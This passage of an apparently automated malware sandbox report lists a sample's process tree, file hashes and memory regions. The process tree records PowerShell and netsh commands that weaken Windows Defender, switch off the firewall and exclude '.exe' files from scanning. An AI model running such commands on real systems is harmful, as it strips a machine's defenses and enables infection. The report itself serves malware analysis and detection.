          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1664
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:6384
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:6328
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:6752
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4632
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:7160
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ScanScheduleDay 8
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1160
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:864
            • C:\Windows\SysWOW64\netsh.exe
              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
              3⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:6900
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell" Get-MpPreference -verbose
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1568
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:6268

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          1KB

          MD5

          28854213fdaa59751b2b4cfe772289cc

          SHA1

          fa7058052780f4b856dc2d56b88163ed55deb6ab

          SHA256

          7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915

          SHA512

          1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          2eb8bc6fde584f9df25a730d5331aaab

          SHA1

          533bea603c52bf4c1e770fd819cc9089a8f53109

          SHA256

          4814a51b202c897a37ec6af4488cc3a87b8a0e2ec581e363bfa35f9fcf646b54

          SHA512

          d6d374462de04a490a594949bd4672874d1c9bfc711287190b684d3a000fa740866d8bc039cdb900310ff942057164fdf9592c3926b82632661ad27e25a62820

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          ea77f2408f9e7d0f3f3f13cd210cb735

          SHA1

          dd84d513987f7462cef279feaa4b5c75709ccf7f

          SHA256

          d7b45021e2de0c0a0c3b8f619422be755263749e4178145778bcebc792492f87

          SHA512

          745601ae9b388f3d61526c01366d73c971f2c26bae75e9df96d33f1c57d31af27b43ed8dd799c6eb37666631c344f6bdd059995ebf5b9494f96dc21eddbd29b9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          45519a3958ab72568e285cc3bb577692

          SHA1

          be4c0675d13447bcd10c91983360560fedc51358

          SHA256

          61c05984c3c6b0c63fb0b2b93d956c00083a9481cdd69d84c0a3fd3f930f2d50

          SHA512

          4b5e54b1effbc0bf4b1cc4fae95b5be08321b8404f5ca4a8b985d1caaa43395f38e9f04e05614682686b01b413f742d519e20c69dc6eeba303a6612a9f9d0b78

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          1363458adc254dc9939032994df8ab64

          SHA1

          8a04570cd9d04c7be48a587339544e53bb0a4e0d

          SHA256

          8be75485bf2e91db4e753c658d03dac5f40bd0dbb858c4535afa31f1e8c5d6b7

          SHA512

          c39009b1185e506ecf6415712eaa50c4d592de371a9c9a8e6ef7de71e062f6b7ca69f30eb9a832fa2e94698b68a566099266234ab02be5f928398a99a0a95c08

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          2b06358be0ae1c2c4bf17b07aa0fb806

          SHA1

          ff18d4465a5d647490cdfd1a1e4d5fbee27bf5fc

          SHA256

          b2cd02f05c894d3352ce94699a8a05f62b3581d71b97867c7cbcd0ab899cd87c

          SHA512

          138907fa3df49d057c92ed2e9fdf1a5684aca8d91968346722607b4ea58395767de4fdb81ee693405526cb6105c549ef081978316366130200cf9521313e8f72

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          de8a63672f56cf58206e43fec1f36d6e

          SHA1

          35a4466d836be80746177da4f137e4e091108798

          SHA256

          7bc64a9ea1ec308d8d272571839dc03f4c2c21224b6eb4b48f81970ed3a64fef

          SHA512

          e98d0929205d48064534df1d4a3d717b1dc4435ef9c7e078e70fc0b6958f69f1f1b4c0197cadc9c267b1f5c14ce831c38edaac199dbdaef79397c58eea59a2ed

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          ee37fb46bca929a9d6670284814efae7

          SHA1

          b9767db7f3783fe216293b06e6c0a915ef95a1db

          SHA256

          faa2094af60ac93fb0586b8a1285416cdab535c3b01421f9f81ab6eec1f8bcd8

          SHA512

          4af7f998dc0360b19f9b68597fdb8c9388c5397b8b6b804e04e3df4e94e87b574893307c743caf64bb4a635bafdd57264c50a24db8f573b05eb7d331b069104d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          44f8d970ded759228c3151a0dd619abf

          SHA1

          46458cdc480da0c32295187eeb8cc1f7e8d737fb

          SHA256

          d7423ea321f8aabeff36fdf1bded870c5ec151e97a26eaa4dfca34fcb0bc66ab

          SHA512

          c7b20c473c50846109e048e17b9eeb470a7a03840a1f392bdd1ee18206ac9ea2de6987daff468de46d771c07e27cd3935871cb925f042ccbd43d7b520f4c5ff0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          7dd550d348894ced59e197284a894cae

          SHA1

          1d51b1dd93c6337a58d67d50a459265bd070e9eb

          SHA256

          5ff7b0fe077e7741b4b043b74f44f562ed5a8695b744004213542c944e784c26

          SHA512

          1809a7a8f3f9fb8ecd8143aa6e223d1bb0e75c6ec0770848afcca9566332bfe59058cff23f1e1a331641c1c655678ce737e9092f88344c8ef65f9d4880cbf113

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          e2821c25b6779ca79caa50fd51582028

          SHA1

          a2c658e2a4e58c412985d2c9529be3600ed96ec8

          SHA256

          8571213abc63893bc697dd2773f2be741e669986170b36efb3b19567207b0528

          SHA512

          c5747d07c0c5257dc1674beb38762e73d34e7f9c3854f6cb6bc279fdda2deda7ba0c70f134bc84653fa4b1b95ffc0a5d7c5d77041a3977ee2a434db2db86b9e2

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          d723c553af5ad088f0717404109531d4

          SHA1

          04091241587326282b9afd287153124412eb8110

          SHA256

          4d82d7c7ce753f4534f6e783c215cc8492a89508601b28b4a49cdd82bcab38d2

          SHA512

          21bf83966162b1fc6a0748c756050c9a1b635ea68e2d6110c12aad778eefdc5479c4d79945fb02ba0238f59de1219fa6df87ef6d198c46900ec678f2481dc6ff

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          429cf8da6208efbeb3c2253a95a67629

          SHA1

          33c515505ffa9029aaf7a0d065d2f88ae745cc7b

          SHA256

          c4885256f8b24abd5ae9354e290878275a80937bcdc47eb3af29734d994c79ea

          SHA512

          272ecca9dc4148cfa794ac43d5519674d55a4019b602a1aba7c4210eaca2546913029ea0c5e2bc2620afa2ad4435414fac7f16858f91ef84334579fa84639aa7

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          b389011c728d441c939872bcdf57786d

          SHA1

          dc3876c99d473638b3e221d1520b956633081d31

          SHA256

          5e1f5a296c7d6d947ab25f822d0640494251d4508e89f0ad3d7ec0c35a516db8

          SHA512

          a1395bfbca664114a71b933ad983aac754e000f216a25525537ff5f91516e4ba379f9d906529a1772dd8ccb1f053b2929497b8627a0be5ebff05d12c2abf35f3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          7d2db289583a00ac2257e198ddda2f41

          SHA1

          fa7ffdef5735c0d11a632d4cfe0806c3316baf82

          SHA256

          a483d5ad830d441c4a93bdcc00f4ab6194791f7c4ad36f3a5d92c7eb7400e4a1

          SHA512

          5d385d534f32bfa5f9946478abf14d3991bebca979a2e549167218709fdc1bf817ea2854d476de050a7c2554be7362863a83d3245f196c02ec9bd2b98db457d9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          d09288eae1116e22fc8db6ac4423792f

          SHA1

          610245b91976c8711a3beaeb2a36bb5b786cf526

          SHA256

          8e996867c90f860c70464047155a30df52fb094be818ba724afaa2629562010c

          SHA512

          ade62b073fa03261c343c3dc4552a6bb38747bb1d21c8bf257d2d6651648e78faec4c352aecb4654655acd65ee1721e806757210de5115038d8d7c061e0307fd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          426fab1f1c2235d2cac6a33255c0d91f

          SHA1

          9fafeba39f2ebc4e60626204d794f6250ee51889

          SHA256

          5dd0f93f6814e5be063b0df30df0d27f0d545e01b363c363ed86719927d527f8

          SHA512

          ba56bc6f77da1ed6558cacae54170de35e1505a560d64c318c6cbb23ee7b5182eca268ef74ef3d2c2c3710b37df181f4bb23b9fbe2fbb0532887f64b64dd6713

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          1a7e9639c44660d6f68694db0789b06e

          SHA1

          655bbe9135b2737da42fa1b6241acf1fb0301dec

          SHA256

          66a3645840bf174a2f8e67042cccc9ab014908fb62b2214324c9bd18e6516740

          SHA512

          eec23ac281f6fb6f2ffb9b0fa8b6665e3295b04f5fe45b6ff841f2b3e57eabcee3dcbfb7e111bef6440553644135ee49f07bf0ec6c130e76122cf0ac976edd0c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          d77d2e627d48421bd08bd67cfe6f5b4c

          SHA1

          2d93f815d9a0b5ab2fb2c8eb8eddb0465c8a66d1

          SHA256

          2d94ec444518c51b30a41243f72ea7ae2589d3452331928b7bace5e273df2a88

          SHA512

          68fe18aee6189b60c59a96f4ab6290dbfe6c643bc1df6d157905d1c0c49215d9394558c71f14ec711b26623abdef5331f11cb7f08b0f02cf3bb56e4093a410aa

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          72a2cfc0b9e92ae4e3fa83a95d15f9cc

          SHA1

          42fc08d8a95f1ddfb53482c0af4078fce7597dcf

          SHA256

          e5637500095eb0797158b220042e21b5bfc8d16600141a033a3b51dddafd7ed8

          SHA512

          fa6ee1e4f9a0202827ffe6e7590ccdaa4c68ace4a87a19a73c5e9b2eefb36c0862e0ce4def4a5b61dff3fd9a6a4f9d449da7695b88a73a1be66a40bdc460cd9e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          8c2b855e108576d41260f7c0c74c0200

          SHA1

          8b29ac7ec0799bae0cca567189168f7bb8cd570d

          SHA256

          254e6982fe163eb3af8af17c55858fdd9cb3da49f29b8880501fafa37bb95a24

          SHA512

          caacf763e8c71b5f1df9994917c1f6ecfb277d0627f0c332992f2d7bf9139db6f1bc949e9270b45998868105cb967de261b4479e765d4d247e1b897a53ea6e8b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          04320ea876d630aece0463d2f37688dc

          SHA1

          9c668e83fc7897e6e1a0fc532eb059705486ef5d

          SHA256

          9348de859b7330fb3756290a026b931323c7895f7b2b48f8f56f57590e05dff2

          SHA512

          03fb59ace1a41e0988a7c5f5944bef22aa24aab81c926c863a1109a210e015be7ad97c3b842dece41af23956e64c3964a5900c8964eb94f854ed49b4f1fdec11

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          9ce05a407d084ba6bbd1a039871ba3bc

          SHA1

          33e9b354fe13534f9fa0e270a1a6a8e67789eaf8

          SHA256

          f713e0db027b3feb3b8793303e85447ff27cfa4432e953761963141c086fbdce

          SHA512

          9f4d6b2ecf604f717abde8553d23908bc48504a9ccb78849ed5a2594017fb0928a5533d15dd8b151648e4c4c78a5b255e9e6d075bf9030d0c260687016282230

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          20e6d71c9190d1e1545745d77718a2cf

          SHA1

          67950c06996b764aef26b490bc001e7be3405d65

          SHA256

          c3f8e04401643bb00823a240ded67e219dbf2c323a72bdce93c4cbb3b5114eaa

          SHA512

          8e08a50fbfccd8e543f1e6f13540f617cea7bed038741f7005b0e138c7f1297d1a5d1cfa8618ed17550fd08ef5d234cf14589d43b904cc894433efbe4f07ad26

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          8839407f052ad1b17e23f85f9cb83c74

          SHA1

          826537d9a80e2fd72ac59ec4b0e3244b12917a03

          SHA256

          92ccaf387fac3601442d0fbec1e7ce7f787d1d121a0fe20161e7b70b927b1f1a

          SHA512

          ab9377aa1f6dcb760d69cca53baeac3df7d7a79d353e008ec2fdf3996bd0cebe61b811ed5f3f0e6a96e3f1264e2b795235b40fb30dc766031642d42d1d0441fe

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          11KB

          MD5

          a1d0537ea398fc5f369f5abceafe5f1a

          SHA1

          ed16d1156bade81c9a48e7901384830e0199a8dd

          SHA256

          a29674bf8fa50fcdaebb9e08cc8c7ad4be1623817395228895569b9d064cba4c

          SHA512

          0fb3112cef70d9f9d46a8ba754ff67505e9371c4025ca6d24b3bb84900a9062113e02dc2688e1005df7743ddaa53ffadfebd6468b1a952105a6f881e9495a6e6

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          085fd49774137797eb737132f1a28d1b

          SHA1

          23ca45acf03398055652a907e70c989ea92ca24d

          SHA256

          a2bdf283c6403f49200a5fc75d7a6468e65254741867ee713df5094d4d5afd09

          SHA512

          20581533d3824c76f8f53cbeb133669a526f675f2f54f9593fbd0f952623a4007ca7edcec4210d4560855059c4007c4b8033442da6a574214ebee61957b3798d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          cd96379d0678de2ec9ce9b0516918792

          SHA1

          ac7f7ad8a010924201885665bc01da70e9cc4ad3

          SHA256

          f62acf85325c0b3ee1756e6128e99f4b6919fdf3bcf064f66ec10e0bdc9a5f7d

          SHA512

          caaa9a9bba2393329ce55a1595c8f50c554efec34b284e9ed469fa4640b501e9df4b2aa0c6c380528df0abca14f8ac4fe2184c89ba2c22d5475859c7375c09ad

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          20d966ca6960c7379f3ed4852b729aec

          SHA1

          d617e6110bc78785d8cb2b3c826f17542ad7fe4f

          SHA256

          b0dc8ff220893d31a1f06a658fbee7fe456f28514fbdd797153bbd0c8d27cc3f

          SHA512

          63a8dcb250e5f0554dd14bc19eb3a11e443426fbaf9c24302d80291a2b98277331417fd319c7cbc1144a5b521b9c1edf3ff6005217695bcc40b2072addbd6e32

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          150e371fd351f92c755a6aab97d9f27e

          SHA1

          81801c762b82bd070af177b6dc16d5a80c7ca98f

          SHA256

          a357f2394c74c89d7cd694bff110d1720d3746b8acb4ea279d1abc95987cb4a7

          SHA512

          2bfc33cf71af448550ca89b76b7040af377e6ae5fa18772ffeaeef2db5729f0ca1cf24a3d0fe35ca00f4a1c5d50247e29dd9de0518d673a98058c93f7959508c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          02cd65e7dfeb1f2ef5e5a97b916de277

          SHA1

          8dfd5bb12342d9fac941896c3955f8dbdf971b08

          SHA256

          92582ab390dc5a0f0eabe044b242b45f3278df955acba660a9911812456041fe

          SHA512

          c42769b05ea9ef9242446322c75c4c83a0cf8a5e4134de18ec64b15d680d4ae9fac8a63958aa845aa0478bd84d460a9ab17e882ac97f59cf8333674e6b829a49

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          c9af773774c2eea8c7b4c5a9dea44fbb

          SHA1

          a63e59d122fbbd3baa7f8e988ceef4eaaf29c5ad

          SHA256

          643c7e86ff1d0ba9a0f1f9787acf7f476b1ce3aa4e7e4cc02246fd9be2115c59

          SHA512

          0a35c5dfe221d3bfb4125b6a7d9443cb0a4eee1cbb0110afe7da3bb8b7f497433b808324d38dc74b160e8656555d9c57e7c47dfbbd6e1b537696d49bdd9e204c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          b7c59b68a89f4b161a3c02246698cce6

          SHA1

          e93c154d0defe6273d3857fa8623bb474194bbaa

          SHA256

          1b415ef6ac709c1b08d3f339ae7eb98808eda6e971821657064467306bdbdca4

          SHA512

          7e44a908c66e2210b6d483d4e02d69178c5b6f9ae8d8ca8b45ed28a473e4be1b1c11c6799d73feeade9698e1c15082206424e4e72d8a9f6e10deeea3c5535cfc

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          44d7d9b33f7c9196aae4fb1f5f21db62

          SHA1

          c7c63a191d9580a3a9df47f23313fcf77c7021f3

          SHA256

          c48f74dacb02deed26ac0f0c6ca3620f7a391c6f12fb67fabcec2fce42003e14

          SHA512

          ebdc6036932d60e55d7a77661fa65359372765df9aab0a9e24583e2c69e8badd0bb4c75ee138a442719e078a3ce8476b3d1948a9daeb2c66e6094e96488dcaa8

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          eefdce1cc70f6dae7fb8a457259bd65a

          SHA1

          74cab9fc422761e6714d64afbee45b1608d8a79d

          SHA256

          085ec82e99df7e0e03999a65380fea122a9e76a561fdec107430ef85f1cf1662

          SHA512

          f4bc403bbf027fb1495c40688209bf019e0f037ed6be411a8cc978354262758e7b8b9eb48921083781c27919fc0487520d589a3c18460281f495ad502fd23890

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          080f081b2617c5fbd969a797428b7884

          SHA1

          9e2079e04d686772e7ab66440f330b15981bb017

          SHA256

          62fbfdbe16de0d9f41ec5ccff7930b613a92afbe0038bd1d394d825b2817c99f

          SHA512

          ca208bcd88322c394a174e3bbb7a194cc1fd06cbe34c137a8a0a379ef526555d65eda4f9eb21873e97229c6a17bb8b964b9c4d24cc3a8097896e9f0c9c80c3f5

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          09923277f8000a8945a4f8184505ed0e

          SHA1

          0479cbc4500e64b54187177110d3400b33206915

          SHA256

          38920ead854c440bfe3799fa46681c3cdb263ad9c0db03578fbfeece8277e9fb

          SHA512

          c24d9ea75b7c5c6aa3caaa63386e2255bf1407e292b946fbfca1ae50f84382d854f2e22646947fe232bcbaccd32c981761f1af7ecfff345891100f1d4991213a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          6492815ce67030c8662111ee8407a4e7

          SHA1

          1115ae32cf7607496c4fff29768716dd4c3af535

          SHA256

          8e99a9ba5076f9160846581e64b045a0e0c11a2fdfb5696a2be8ceef949bc568

          SHA512

          568678a001cb17a871ad316597ded16dbc72a8cba42704dd9d02f9c321b345f8932947ffada2c7562c4a442708935cba215e682a5f1e6cdfb3ffea84ee00f625

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xw4nrekr.rad.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/116-655-0x0000000007850000-0x000000000785A000-memory.dmp

          Filesize

          40KB

        • memory/116-709-0x00000000079D0000-0x00000000079E1000-memory.dmp

          Filesize

          68KB

        • memory/116-794-0x0000000007A50000-0x0000000007A58000-memory.dmp

          Filesize

          32KB

        • memory/116-783-0x0000000007A60000-0x0000000007A7A000-memory.dmp

          Filesize

          104KB

        • memory/116-772-0x0000000007A20000-0x0000000007A34000-memory.dmp

          Filesize

          80KB

        • memory/116-686-0x0000000007AB0000-0x0000000007B46000-memory.dmp

          Filesize

          600KB

        • memory/116-651-0x0000000007E00000-0x000000000847A000-memory.dmp

          Filesize

          6.5MB

        • memory/116-652-0x00000000077C0000-0x00000000077DA000-memory.dmp

          Filesize

          104KB

        • memory/116-620-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/628-656-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/832-676-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/1064-741-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/1160-825-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/1528-641-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/1528-751-0x0000000007AA0000-0x0000000007AAE000-memory.dmp

          Filesize

          56KB

        • memory/1568-815-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/1632-731-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/1664-752-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/3100-699-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/3116-721-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/4284-710-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/4504-4-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/4504-21-0x0000000007620000-0x0000000007698000-memory.dmp

          Filesize

          480KB

        • memory/4504-902-0x0000000001570000-0x0000000001580000-memory.dmp

          Filesize

          64KB

        • memory/4504-5-0x0000000006820000-0x00000000068B2000-memory.dmp

          Filesize

          584KB

        • memory/4504-19-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/4504-20-0x00000000016A0000-0x0000000001718000-memory.dmp

          Filesize

          480KB

        • memory/4504-16-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/4504-903-0x0000000003010000-0x0000000003034000-memory.dmp

          Filesize

          144KB

        • memory/4504-17-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/4504-18-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/4504-3-0x0000000005C20000-0x00000000061C4000-memory.dmp

          Filesize

          5.6MB

        • memory/4504-15-0x0000000006D70000-0x0000000006D8E000-memory.dmp

          Filesize

          120KB

        • memory/4504-837-0x000000000AAC0000-0x000000000AFEC000-memory.dmp

          Filesize

          5.2MB

        • memory/4504-2-0x0000000005600000-0x0000000005632000-memory.dmp

          Filesize

          200KB

        • memory/4504-6-0x00000000067E0000-0x00000000067EA000-memory.dmp

          Filesize

          40KB

        • memory/4504-904-0x0000000007EC0000-0x0000000007F2C000-memory.dmp

          Filesize

          432KB

        • memory/4504-0-0x000000007484E000-0x000000007484F000-memory.dmp

          Filesize

          4KB

        • memory/4504-9-0x00000000070D0000-0x000000000716C000-memory.dmp

          Filesize

          624KB

        • memory/4504-10-0x0000000006D00000-0x0000000006D66000-memory.dmp

          Filesize

          408KB

        • memory/4504-11-0x000000007484E000-0x000000007484F000-memory.dmp

          Filesize

          4KB

        • memory/4504-12-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/4504-13-0x0000000007820000-0x0000000007896000-memory.dmp

          Filesize

          472KB

        • memory/4504-14-0x0000000006A60000-0x0000000006A70000-memory.dmp

          Filesize

          64KB

        • memory/4504-1-0x0000000000D40000-0x0000000000D76000-memory.dmp

          Filesize

          216KB

        • memory/4632-795-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/4872-618-0x0000000006470000-0x000000000648E000-memory.dmp

          Filesize

          120KB

        • memory/4872-607-0x0000000006E90000-0x0000000006EC2000-memory.dmp

          Filesize

          200KB

        • memory/4872-619-0x0000000007170000-0x0000000007213000-memory.dmp

          Filesize

          652KB

        • memory/4872-608-0x000000006EE00000-0x000000006EE4C000-memory.dmp

          Filesize

          304KB

        • memory/5584-39-0x0000000005C30000-0x0000000005C52000-memory.dmp

          Filesize

          136KB

        • memory/5584-41-0x0000000005DB0000-0x0000000006104000-memory.dmp

          Filesize

          3.3MB

        • memory/5584-22-0x0000000002AB0000-0x0000000002AE6000-memory.dmp

          Filesize

          216KB

        • memory/5584-23-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/5584-25-0x0000000005600000-0x0000000005C28000-memory.dmp

          Filesize

          6.2MB

        • memory/5584-28-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/5584-24-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/5584-239-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/5584-40-0x0000000005CD0000-0x0000000005D36000-memory.dmp

          Filesize

          408KB

        • memory/5596-29-0x0000000074840000-0x0000000074FF0000-memory.dmp

          Filesize

          7.7MB

        • memory/5596-27-0x0000000074840000-0x0000000074FF0000-memory.dmp

